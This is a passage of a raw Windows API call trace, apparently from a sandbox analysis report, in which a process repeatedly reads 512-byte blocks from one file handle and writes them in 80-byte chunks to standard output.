lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] GetFileType (hFile=0x50) returned 0x1 [0207.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.709] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.710] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.710] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] GetFileType (hFile=0x50) returned 0x1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.710] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType 
(hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.711] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.711] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.711] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.711] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.711] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, 
lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] GetFileType (hFile=0x50) returned 0x1 [0207.712] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.712] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.712] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.712] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.712] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 
[0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] GetFileType (hFile=0x50) returned 0x1 [0207.713] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.713] WriteFile (in: hFile=0x50, 
lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.713] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.714] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.714] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.714] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.714] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.715] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.715] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, 
lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.715] GetFileType (hFile=0x50) returned 0x1 [0207.715] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 
| out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.716] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.716] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] GetFileType (hFile=0x50) returned 0x1 [0207.716] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.716] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 
[0207.717] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.717] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.717] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] GetFileType (hFile=0x50) returned 0x1 [0207.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.717] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: 